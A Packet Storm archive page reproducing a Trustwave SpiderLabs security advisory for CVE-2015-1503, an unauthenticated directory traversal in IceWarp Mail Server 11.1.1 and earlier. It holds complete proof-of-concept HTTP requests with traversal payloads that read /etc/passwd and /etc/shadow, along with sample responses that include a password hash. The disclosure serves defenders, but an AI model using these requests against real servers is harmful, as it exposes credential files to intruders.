Twenty Year Anniversary

IceWarp Mail Server Directory Traversal

IceWarp Mail Server Directory Traversal
Posted May 4, 2018
Authored by Piotr Karolak | Site trustwave.com

IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.

tags | exploit, file inclusion
advisories | CVE-2015-1503
MD5 | 4bb1b4b87510a3f0f06591f5e0e32e8a

IceWarp Mail Server Directory Traversal

Change Mirror Download
Vendor: IceWarp (http://www.icewarp.com)
Product: IceWarp Mail Server
Version affected: 11.1.1 and below

Product description:
IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection.
IceWarp Mail Server is a commercial mail and groupware server developed by IceWarp Ltd. It runs on Windows and Linux.

Finding 1: Multiple Unauthenticated Directory traversal
Credit: Piotr Karolak of Trustwave's SpiderLabs
CVE: CVE-2015-1503
CWE: CWE-22

#Proof of Concept

The unauthenticated Directory Traversal vulnerability can be exploited by
issuing a specially crafted HTTP GET request to the
/webmail/client/skins/default/css/css.php. Directory Traversal is a
vulnerability which allows attackers to access restricted directories and
execute commands outside of the web server's root directory.

This vulnerability affects /-.._._.--.._1416610368(variable, depending on
the installation, need to check page
source)/webmail/client/skins/default/css/css.php.

Attack details
URL GET input file was set to ../../../../../../../../../../etc/passwd

Proof-of-Concept:

The GET or POST request might be sent to the host A.B.C.D where the IceWarp mail server is running:

REQUEST
=======
GET /-.._._.--.._1416610368/webmail/client/skins/default/css/css.php?file=../../../../../../../../../../etc/passwd&palette=default&skin=default HTTP/1.1
Referer: http://a.b.c.d/
Cookie: PHPSESSID_BASIC=wm-54abaf5b3eb4d824333000; use_cookies=1; lastLogin=en%7Cbasic; sess_suffix=basic; basic_disable_ip_check=1; lastUsername=test; language=en
Host: a.b.c.d
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*


RESPONSE:
=========
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

....TRUNCATED

test:x:1000:1000:test,,,:/home/test:/bin/bash
smmta:x:116:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:117:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
mysql:x:118:127:MySQL Server,,,:/nonexistent:/bin/false

The above proof-of-concept would retrieve the /etc/passwd file (the
response in this example has been truncated).

#Proof of Concept

The unauthenticated Directory Traversal vulnerability can be exploited by
issuing a specially crafted HTTP GET and POST request payload
..././..././..././..././..././..././..././..././..././..././etc/shadow
submitted in the script and/or style parameter. Directory Traversal is a
vulnerability which allows attackers to access restricted directories and
execute commands outside of the web server's root directory.

The script and style parameters are vulnerable to path traversal attacks,
enabling read access to arbitrary files on the server.

REQUEST 1
=========

GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
Host: a.b.c.d
Accept: */*
Accept-Language: en
Connection: close
Referer: http://a.b.c.d/webmail/old/calendar/index.html?_n[p][content]=event.main&_n[p][main]=win.main.public&_n[w]=main
Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en

REQUEST 2
=========

GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
Host: a.b.c.d
Accept: */*
Accept-Language: en
Connection: close
Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en

RESPONSE
========
HTTP/1.1 200 OK
Connection: close
Server: IceWarp/11.1.1.0
Date: Thu, 03 Jan 2015 06:44:23 GMT
Content-type: text/javascript; charset=utf-8

root:!:16436:0:99999:7:::
daemon:*:16273:0:99999:7:::
bin:*:16273:0:99999:7:::
sys:*:16273:0:99999:7:::
sync:*:16273:0:99999:7:::
games:*:16273:0:99999:7:::
man:*:16273:0:99999:7:::
lp:*:16273:0:99999:7:::

....TRUNCATED

lightdm:*:16273:0:99999:7:::
colord:*:16273:0:99999:7:::
hplip:*:16273:0:99999:7:::
pulse:*:16273:0:99999:7:::
test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7:::
smmta:*:16436:0:99999:7:::
smmsp:*:16436:0:99999:7:::
mysql:!:16436:0:99999:7:::


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    10 Files
  • 2
    Nov 2nd
    15 Files
  • 3
    Nov 3rd
    2 Files
  • 4
    Nov 4th
    2 Files
  • 5
    Nov 5th
    32 Files
  • 6
    Nov 6th
    27 Files
  • 7
    Nov 7th
    8 Files
  • 8
    Nov 8th
    9 Files
  • 9
    Nov 9th
    17 Files
  • 10
    Nov 10th
    2 Files
  • 11
    Nov 11th
    2 Files
  • 12
    Nov 12th
    33 Files
  • 13
    Nov 13th
    29 Files
  • 14
    Nov 14th
    23 Files
  • 15
    Nov 15th
    45 Files
  • 16
    Nov 16th
    11 Files
  • 17
    Nov 17th
    1 Files
  • 18
    Nov 18th
    1 Files
  • 19
    Nov 19th
    3 Files
  • 20
    Nov 20th
    16 Files
  • 21
    Nov 21st
    7 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close